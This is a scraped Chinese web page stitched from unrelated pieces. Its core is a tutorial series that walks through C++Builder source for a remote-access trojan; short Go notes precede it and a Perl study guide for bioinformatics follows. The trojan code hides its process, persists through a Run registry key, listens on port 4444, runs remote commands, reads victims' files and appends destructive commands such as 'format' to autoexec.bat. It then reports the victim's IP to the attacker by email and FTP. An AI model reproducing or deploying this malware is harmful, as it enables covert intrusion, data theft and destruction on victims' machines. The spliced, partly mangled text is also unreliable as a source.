先使用 ioutil.ReadDir 遍历出指定目录下的文件,再递归进目录中遍历,问题的关键在于识别出文件为目录, fs.FileInfo 中有一个 IsDir() 函数可以识别是否是目录
正则匹配使用 regexp.MatchString ,regexp中有很多正则操作的工具,如根据正则替换字符串中的指定字符
木马是如何编写的(一)特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷,使在Dos??Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。
我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!呵呵,要知道,木马(Trojan)的历史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木马是由一些玩程式(主要是C)水平很高的年轻人(主要是老美)用C或Shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。那时木马的主要方法是诱骗??先修改你的.profile文件,植入木马;当你登陆时将你敲入的口令字符存入一个文件,用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的,对网络可以说很陌生。直到Win9x横空出世,尤其是WinNt的普及,大大推动了网络事业的发展的时候,BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马(甚至在Win9x的“关闭程序”对话框可以看到进程)给了当时中国人极大的震撼,它在中国的网络安全方面可以说是一个划时代的软件。
自己编写木马,听起来很Cool是不是?!木马一定是由两部分组成??服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是TCP/IP协议)。为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。
首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈??难道你还给受害者传一个1兆多的动态链接库??Msvbvm60.dll吗?
启动C++Builder 5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。
Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。
我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程(Service Process)就可以了。不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。
首先判断目标机的操作系统是Win9x还是WinNt:
{
DWORD dwVersion = GetVersion()
// 得到操作系统的版本号
if (dwVersion >= 0x80000000)
// 操作系统是Win9x,不是WinNt
{
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD)
file://定义RegisterServiceProcess()函数的原型
HINSTANCE hDLL
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess
hDLL = LoadLibrary("KERNEL32")
file://加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess")
file://得到RegisterServiceProcess()函数的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1)
file://执行RegisterServiceProcess()函数,隐藏本进程
FreeLibrary(hDLL)
file://卸载动态链接库
}
}
这样就终于可以隐身了(害我敲了这么多代码!)。为什么要判断操作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。接着再将自己拷贝一份到%System%目录下,例如:C:\Windows\System,并修改注册表,以便启动时自动加载:
{
char TempPath[MAX_PATH]
file://定义一个变量
GetSystemDirectory(TempPath ,MAX_PATH)
file://TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小,得到目标机的System目录路径
SystemPath=AnsiString(TempPath)
file://格式化TempPath字符串,使之成为能供编译器使用的样式
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE)
file://将自己拷贝到%System%目录下,并改名为Tapi32.exe,伪装起来
Registry=new TRegistry
file://定义一个TRegistry对象,准备修改注册表,这一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE
file://设置主键为HKEY_LOCAL_MACHINE
Registry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE)
file://打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就创建之
try
{
file://如果以下语句发生异常,跳至catch,以避免程序崩溃
if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")
Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe")
file://查找是否有“crossbow”字样的键值,并且是否为拷贝的目录%System%+Tapi32.exe
file://如果不是,就写入以上键值和内容
}
catch(...)
{
file://如果有错误,什么也不做
}
}
好,FormCreate过程完成了,这样每次启动都可以自动加载Tapi32.exe,并且在“关闭程序”对话框中看不见本进程了,木马的雏形初现。
接着选中ServerSocket控件,在左边的Object Inspector中将Active改为true,这样程序一启动就打开特定端口,处于服务器工作状态。再将Port填入4444,这是木马的端口号,当然你也可以用别的。但是你要注意不要用1024以下的低端端口,因为这样不但可能会与基本网络协议使用的端口相冲突,而且很容易被发觉,因此尽量使用1024以上的高端端口(不过也有这样一种技术,它故意使用特定端口,因为如果引起冲突,Windows也不会报错 ^_^)。你可以看一看TNMFTP控件使用的端口,是21号端口,这是FTP协议的专用控制端口(FTP Control Port);同理TNMSMTP的25号端口也是SMTP协议的专用端口。
再选中ServerSocket控件,点击Events页,双击OnClientRead事件,敲入以下代码:
{
FILE *fp=NULL
char * content
int times_of_try
char TempFile[MAX_PATH]
file://定义了一堆待会儿要用到的变量
sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str())
file://在%System%下建立一个文本文件Win369.bat,作为临时文件使用
AnsiString temp=Socket->ReceiveText()
file://接收客户端(攻击者,也就是你自己)传来的数据
}
好,大门敞开了!接着就是修改目标机的各种配置了!^_^ 首先我们来修改Autoexec.bat和Config.sys吧:
{
if(temp.SubString(0,9)=="edit conf")
file://如果接受到的字符串的前9个字符是“edit conf”
{
int number=temp.Length()
file://得到字符串的长度
int file_name=atoi((temp.SubString(11,1)).c_str())
file://将第11个字符转换成integer型,存入file_name变量
file://为什么要取第11个字符,因为第10个字符是空格字符
content=(temp.SubString(12,number-11)+'\n').c_str()
file://余下的字符串将被作为写入的内容写入目标文件
FILE *fp=NULL
char filename[20]
chmod("c:\\autoexec.bat",S_IREADS_IWRITE)
chmod("c:\\config.sys",S_IREADS_IWRITE)
file://将两个目标文件的属性改为可读可写
if(file_name==1)
sprintf(filename,"%s","c:\\autoexec.bat")
file://如果第11个字符是1,就把Autoexec.bat格式化
else if(file_name==2)
sprintf(filename,"%s","c:\\config.sys")
file://如果第11个字符是1,就把Config.sys格式化
times_of_try=0
file://定义计数器
while(fp==NULL)
{
file://如果指针是空
fp=fopen(filename,"a+")
file://如果文件不存在,创建之;如果存在,准备在其后添加
file://如果出错,文件指针为空,这样就会重复
times_of_try=times_of_try+1
file://计数器加1
if(times_of_try>100)
{
file://如果已经试了100次了,仍未成功
Socket->SendText("Fail By Open File")
file://就发回“Fail By Open File”的错误信息
goto END
file://跳至END处
}
}
fwrite(content,sizeof(char),strlen(content),fp)
file://写入添加的语句,例如deltree/y C:或者format/q/autotest C:,够毒吧?!
fclose(fp)
file://写完后关闭目标文件
Socket->SendText("Sucess")
file://然后发回“Success”的成功信息
}
}
上回我们讲到如何修改目标机上的启动配置文件,这回我们就来查看目标机上的目录树和文件吧,这在客户端上使用“dir”命令,跟着敲?:
{
else if(temp.SubString(0,3)=="dir")
{
file://如果前3个字符是“dir”
int Read_Num
char * CR_LF="\n"
int attrib
char *filename
DIR *dir
struct dirent *ent
int number=temp.Length()
file://得到字符串的长度
AnsiString Dir_Name=temp.SubString(5,number-3)
file://从字符串第六个字符开始,将后面的字符存入Dir_Name变量,这是目录名
if(Dir_Name=="")
{
file://如果目录名为空
Socket->SendText("Fail By Open DIR's Name")
file://返回“Fail By Open DIR's Name”信息
goto END
file://跳到END
}
char * dirname
dirname=Dir_Name.c_str()
if ((dir = opendir(dirname)) == NULL)
{
file://如果打开目录出错
Socket->SendText("Fail by your DIR's name!")
file://返回“Fail By Your DIR's Name”信息
goto END
file://跳到END
}
times_of_try=0
while(fp==NULL)
{
file://如果指针是NULL
fp=fopen(TempFile,"w+")
file://就创建system\Win369.bat准备读和写;如果此文件已存在,则会被覆盖
times_of_try=times_of_try+1
file://计数器加1
if(times_of_try>100)
{
file://如果已经试了100次了,仍未成功(真有耐心!)
Socket->SendText("Fail By Open File")
file://就发回“Fail By Open File”的错误信息
goto END
file://并跳到END处
}
}
while ((ent = readdir(dir)) != NULL)
{
file://如果访问目标目录成功
if(*(AnsiString(dirname)).AnsiLastChar()!='\\')
file://如果最后一个字符不是“\”,证明不是根目录
filename=(AnsiString(dirname)+"\\"+ent->d_name).c_str()
file://加上“\”字符后将指针指向目录流
else
filename=(AnsiString(dirname)+ent->d_name).c_str()
file://如果是根目录,则不用加“\”
attrib=_rtl_chmod(filename, 0)
file://得到目标文件的访问属性
if (attrib &FA_RDONLY)
file://“&”字符是比较前后两个变量,如果相同返回1,否则返回0
fwrite(" R",sizeof(char),3,fp)
file://将目标文件属性设为只读
else
fwrite(" ",sizeof(char),3,fp)
file://失败则写入空格
if (attrib &FA_HIDDEN)
fwrite("H",sizeof(char),1,fp)
file://将目标文件属性设为隐藏
else
fwrite(" ",sizeof(char),1,fp)
file://失败则写入空格
if (attrib &FA_SYSTEM)
fwrite("S",sizeof(char),1,fp)
file://将目标文件属性设为系统
else
fwrite(" ",sizeof(char),1,fp)
file://失败则写入空格
if (attrib &FA_ARCH)
fwrite("A",sizeof(char),1,fp)
file://将目标文件属性设为普通
else
fwrite(" ",sizeof(char),1,fp)
file://失败则写入空格
if (attrib &FA_DIREC)
fwrite(" <DIR>",sizeof(char),9,fp)
file://将目标文件属性设为目录
else
fwrite(" ",sizeof(char),9,fp)
file://失败则写入空格
fwrite(ent->d_name,sizeof(char),strlen(ent->d_name),fp)
file://将目录名写入目标文件
fwrite(CR_LF,1,1,fp)
file://写入换行
}
fclose(fp)
file://关闭文件
closedir(dir)
file://关闭目录
FILE *fp1=NULL
times_of_try=0
while(fp1==NULL)
{
fp1=fopen(TempFile,"r")
file://打开Win369.bat准备读
times_of_try=times_of_try+1
file://计数器加1
if(times_of_try>100)
{
file://如果已经试了100次了,仍未成功
Socket->SendText("Fail By Open File")
file://就发回“Fail By Open File”的错误信息
goto END
file://并跳到END处
}
}
AnsiString Return_Text=""
char temp_content[300]
for(int i=0i<300i++) temp_content[i]='\0'
file://定义的一个空数组
Read_Num=fread(temp_content,1,300,fp1)
file://从目标文件中读入前300个字符
while(Read_Num==300)
{
Return_Text=Return_Text+temp_content
file://Return_Text变量加上刚才的300个字符
for(int i=0i<300i++) temp_content[i]='\0'
Read_Num=fread(temp_content,1,300,fp1)
file://重复
}
Return_Text=Return_Text+temp_content
file://Return_Text变量加上刚才的300个字符
fclose(fp1)
file://关闭目标文件
Socket->SendText(Return_Text)
file://返回Return_Text变量的内容
}
}
够长吧?!察看目录树这么费劲啊?!你后面可以用BCB中的各种列表框对Client.exe好好美化美化。接下来就是查看指定文件的内容了,Client将使用“type”命令,(手指累不累啊?):
{
else if(temp.SubString(0,4)=="type")
{
file://如果前4个字符是“type”
int Read_Num
int number=temp.Length()
AnsiString File_Name=temp.SubString(6,number-4)
file://将目标文件流存入File_Name变量中
times_of_try=0
while(fp==NULL)
{
fp=fopen(File_Name.c_str(),"r")
file://打开目标文件准备读
times_of_try=times_of_try+1
file://计数器加1
if(times_of_try>100)
{
file://如果已试了100次了
Socket->SendText("Fail By Open File")
file://返回“Fail By Open File”的错误信息
goto END
file://跳到END
}
}
AnsiString Return_Text=""
char temp_content[300]
for(int i=0i<300i++) temp_content[i]='\0'
file://定义一个空数组
Read_Num=fread(temp_content,1,300,fp)
file://从目标文件中读入前300个字符
while(Read_Num==300)
{
Return_Text=Return_Text+temp_content
file://Return_Text的内容加上刚才的字符
for(int i=0i<300i++) temp_content[i]='\0'
Read_Num=fread(temp_content,1,300,fp)
file://重复
}
Return_Text=Return_Text+temp_content
file://Return_Text的内容加上刚才的字符
fclose(fp)
file://关闭目标文件
Socket->SendText(Return_Text)
file://返回Return_Text的内容,即你查看文件的内容
}
}
咳咳!累死了!还是来点轻松的吧??操纵目标机的光驱(注意:mciSendString()函数的声明在mmsystem.h头文件中):
{
else if(temp=="open")
{
file://如果收到的temp的内容是“open”
mciSendString("set cdaudio door open", NULL, 0, NULL)
file://就弹出光驱的托盘
}
else if(temp=="close")
{
file://如果收到的temp的内容是“close”
mciSendString("Set cdaudio door closed wait", NULL, 0, NULL)
file://就收入光驱的托盘。当然你也可以搞个死循环,让他的光驱好好活动活动!^_^
}
}
接着就是交换目标机的鼠标左右键,代码如下:
{
else if(temp=="swap")
{
SwapMouseButton(1)
file://交换鼠标左右键,简单吧?
}
}
然后就是使目标机重新启动。但这里要区分WinNt和Win9x??NT非常注重系统每个进程的权利,一个普通的进程是不应具备有调用系统的权利的,因此我们要赋予本程序足够的权限:
{
else if(temp=="reboot")
{
file://如果收到的temp的内容是“temp”
DWORD dwVersion = GetVersion()
file://得到操作系统的版本号
if (dwVersion <0x80000000)
{
file://操作系统是WinNt,不是Win9x
HANDLE hToken
TOKEN_PRIVILEGES tkp
file://定义变量
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, &hToken)
file://OpenProcessToken()这个函数的作用是打开一个进程的访问令牌
file://GetCurrentProcess()函数的作用是得到本进程的句柄
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid)
file://LookupPrivilegeValue()的作用是修改进程的权限
tkp.PrivilegeCount = 1
file://赋给本进程特权
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0)
file://AdjustTokenPrivileges()的作用是通知Windows NT修改本进程的权利
ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0)
file://强行退出WinNt并重启
}
else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0)
file://强行退出Win9x并重启
}
}
如果以上都不是,就让它在Dos窗口中执行传来的命令:
{
else
{
file://如果都不是
char * CR_TF="\n"
times_of_try=0
while(fp==NULL)
{
fp=fopen(TempFile,"w+")
file://创建Win369.bat,如果已存在就覆盖
times_of_try=times_of_try+1
file://计数器加1
if(times_of_try>100)
{
Socket->SendText("Fail By Open File")
file://返回“Fail By Open File”的信息
goto END
file://跳到END
}
}
fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp)
file://写入欲执行的命令
fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp)
file://写入换行符
fclose(fp)
file://关闭Win369.bat
system(TempFile)
file://执行Win369.bat
Socket->SendText("Success")
file://返回“Success”信息
}
}
你可以直接执行什么Ping和Tracert之类的命令来进一步刺探目标机的网络状况(判断是否是一个企业的局域网),然后可以进一步攻击,比如Deltree和Format命令。^_^
到此,服务器程序的功能已全部完成,但还差容错部分未完成,这样才能避免程序因意外而崩溃。朋友,别走开!(未完待续)
木马是如何编写的(三)
武汉 周侃
上次已编写完服务器端的各种功能,但还差容错部分还未完成,下面我们Go on! 其代码如下(照敲不误 ^_^):
{
END:
Socket->Close()
file://关闭服务
ServerSocket1->Active =true
file://再次打开服务
if (NMSMTP1->Connected) NMSMTP1->Disconnect()
file://如果SMTP服务器已连接则断开
NMSMTP1->Host = "smtp.163.net"
file://选一个好用的SMTP服务器,如163、263、sina和btamail
NMSMTP1->UserID = ""
file://你SMTP的ID
try
{
NMSMTP1->Connect()
file://再次连接
}
catch(...)
{
goto NextTime
file://跳到NextTime
}
NMSMTP1->PostMessage->FromAddress ="I don't know!"
file://受害者的Email地址
NMSMTP1->PostMessage->FromName = "Casualty"
file://受害者的名字
NMSMTP1->PostMessage->ToAddress->Text = "[email protected]"
file://将信发到我的邮箱,这一步很关键
NMSMTP1->PostMessage->Body->Text = AnsiString("Server Running on:") + NMSMTP1->LocalIP
file://信的内容提示你“服务器正在运行”,并且告诉你受害者的目前的IP地址,以便连接
NMSMTP1->PostMessage->Subject = "Server Running Now!"
file://信的主题
NMSMTP1->SendMail()
file://发送!
return
file://返回
NextTime:
NMFTP1->Host = "ftp.go.163.com"
file://你的FTP服务器的地址
NMFTP1->UserID = ""
file://你的用户ID
NMFTP1->Port = 21
file://FTP端口号,一般为21
NMFTP1->Password = ""
file://你的FTP的密码
if(NMFTP1->Connected) NMFTP1->Disconnect()
file://如果已连接就断开
try
{
NMFTP1->Connect()
file://再连接
}
catch(...)
{
return
file://返回
}
AnsiString SendToSite = "Server Running on: " + NMFTP1->RemoteIP
file://受害者的IP地址
FILE * Upload
Upload = fopen(NMFTP1->RemoteIP.c_str(),"w+")
file://创建一个新文件准备写,如果已存在就覆盖
fwrite(SendToSite.c_str(),sizeof(char),SendToSite.Length(),Upload)
file://写入以上的SendToSite的内容
fclose(Upload)
file://写完后关闭此文件
NMFTP1->RemoveDir("public_html")
file://删除public_html目录
NMFTP1->Upload(NMFTP1->RemoteIP, NMFTP1->RemoteIP)
file://上传!
}
啊,超长的OnClientRead事件终于写完了。最后别忘了要在此服务器源码文件中添加以下头文件:
#include <stdlib.h>
#include <dirent.h>
#include <fcntl.h>
#include <dos.h>
#include <sys\stat.h>
#include <winbase.h>
#include <stdio.h>
#include <process.h>
#include <io.h>
#include <mmsystem.h>
至此,服务器端(Server)程序
Perl是典型的脚本语言,短小精悍,非常容易上手,尤其适合处理文本,数据,以及系统管理。它在老一辈的生物信息学分析人员中非常流行,出于历史遗留原因大家肯定会或多或少地接触 Perl,即使你再怎么推崇Python或者GO等新兴编程语言。1 入门资料
两个半小时入门指导:https://qntm.org/files/perl/perl.html
21天学完 perl,自己搜索下载PDF书籍吧!
大小骆驼书,建议都看完,以囫囵吞枣的方式阅读,只看基础知识来入门,难点全部跳过。
官网:https://www.perl.org/
函数如何用:都可以在http://perldoc.perl.org/perl.html 查到
论坛:http://www.perlmonks.org/
2 知识要点
在看书的同时,你必须记住和熟练使用的知识点是下面这些:
理解perl里面的三种变量表示方式
$ 表示单个变量
用单双引号区别,q(),qq()
@ 表示多个变量组成的数组,qw()
% 表示关系型变量-hash
变量不严格区分类型,没有int/float/double/char这样的概念
三种变量都有对应的操作技巧:
简单变量的操作函数
Numerical operators: <> >, <>>=, ==, !=, <=>, +, *
String operators:lt, gt, le, ge, eq, ne, cmp, ., x
数组操作(pop/push/shift/unshift/splice/map/grep/join/split/sort/reverse)
hash操作方式
(keys,values,each,delete,exists)
具体需要在实战里面体会:http://www.biotrainee.com/forum-90-1.html 生信人必练的200个数据处理任务(欢迎大家去练习)
变量内容交换,字符型转为数值型,字符串转为字符数组,字符串变量,heredoc,字符串分割,字符串截取,随机数生成,取整,各种概率分布数,多维矩阵如何操作,进制转换,hash翻转,数组转hash
上下文环境
这个比较复杂: http://www.perlmonks.org/?node_id=738558,就是需要理解你写的程序是如何判断你的变量的,你以为的不一定是你以为的。
正则表达式
这也是一个非常重要的一块内容,基础用法就是m和s,一个匹配,一个替换,比较有趣的就是1,2等等捕获变量。
内建变量
就是perl语言设计的时候定义了一大堆的全局变量($_ $, $0 $>$<$!="" $.="" @argv="" @f="" @_="" @inc="" %env="">)
。外表上看起来都是一个$ @ %符号后面加上一大堆的奇奇怪怪的字符,表示一些特殊变量,这也是perl语言饱受诟病的原因。但是有些非常重要,懂了它之后写程序会方便。下载一个表格,里面有近100个预定义变量需要学习的。
控制语句(循环/条件/判断)
if ... elsif ... else ...
unless/while/next/last/for/foreach
读写文件,脚本实战!
while(<>){
#do something !
}
这是我最喜欢的一个程序模板,读取文件,根据需要处理文件,然后输出。需要实现非常多的功能,然后就可以自己总结脚本技巧,也能完全掌握perl的各种语法。在生物信息学领域,需要实现的功能有!
perl 单行命令
我个人特别喜欢这个知识点,我也专门下载过一本书来学习,把这个教程看完就基本上能全明白:http://www.catonmat.net/blog/perl-one-liners-explained-part-one/。学习单行命令的前提是掌握非常多的奇奇怪怪的perl自定义变量和perl的基础语法,用熟练了之后就非常方便,很多生物信息学数据处理过程我现在基本不写脚本,都是直接写一行命令,完全代替了shell脚本里面的awk、sed/grep系列命令。(perl -p -a -n -a -l -i -F -M)
预定义函数
perl 是一个非常精简的语言,自定义的函数非常少,连min max这样常见的函数都没有,如果你需要使用这样的功能,要么自己写一个函数,要么使用加强版的包,perl的包非常多。
下面列出一些,我常用的函数:
程序必备: use/die/warn/print/open/close/<>/
数学函数:sin/cos/log/abs/rand/srand/sqrt
字符串函数 :uc/lc/scaler/index/rindex/length/pos/substr/sprintf/chop/chomp/hex/int/oct/ord/chr/unpack/unencode
defined/undef
系统操作相关
perl语言是跨平台的,因为它的执行靠的是perl解释器,而perl的解释器可以安装在任何机器上面。所以可以用perl来代替很多系统管理工作。
系统命令调用
文件句柄操作(STDIN,STDOUT,STDERR,ARGV,DATA,)
系统文件管理(mkdir/chdir/opendir/closedir/readdir/telldir/rmdir/)
一些高级技巧
自定义函数 sub , 参数传递,数组传递,返回值
模块操作(模块安装,加载,模块路径,模块函数引用)
引用(变量的变量)
选择一个好的编辑器-编译器,editplus,notepad++,jEdit,编程习惯的养成。
搞清楚perl版本的问题,还有程序编码的问题,中文显示的问题。
程序调试
perl常见模块学习
perl和LWP/HTML做网络爬虫必备,重点是DOM如何解析;
perl和CGI编程,做网站的神器,重点是html基础知识;
DBI相关数据库,用perl来操作mysql等,当然,重点是mysql知识;
GD and GD::Graph 可以用来画图,但是基本上没有人用了,除了CIRCOS画圈圈图火起来了;
TK模块,可以编写GUI界面程序,但是也几乎没有人用了;
XML/pdf/excel/Json 相关的模块可以用来读取非文本格式数据,或者输出格式化报告;
socket通信相关,高手甚至可以写出一个QQ的模仿版本;
最后不得不提的就是Bioperl了,虽然我从来没有用过,但是它的确对初学者非常有用,大多数人不提倡重复造轮子,但我个人觉得,对初学者来说,重复造轮子是一个非常好的学习方式。大家可以仿造bioperl里面的各个功能,用自己的脚本来实现!
3 复习资料
如果你感觉学的差不多了,就可以下载一些复习资料,查漏补缺:
http://michaelgoerz.net/refcards/perl_refcard.pdf
https://rc.hms.harvard.edu/training/perl/Perl%20Cheat%20Sheet.pdf
https://www.cheatography.com/mishin/cheat-sheets/perl-reference-card/
http://www.catonmat.net/download/perl.predefined.variables.pdf
http://www.erudil.com/preqr.pdf
https://www.cs.tut.fi/~jkorpela/perl/regexp.html
https://support.sas.com/rnd/base/datastep/perl_regexp/regexp-tip-sheet.pdf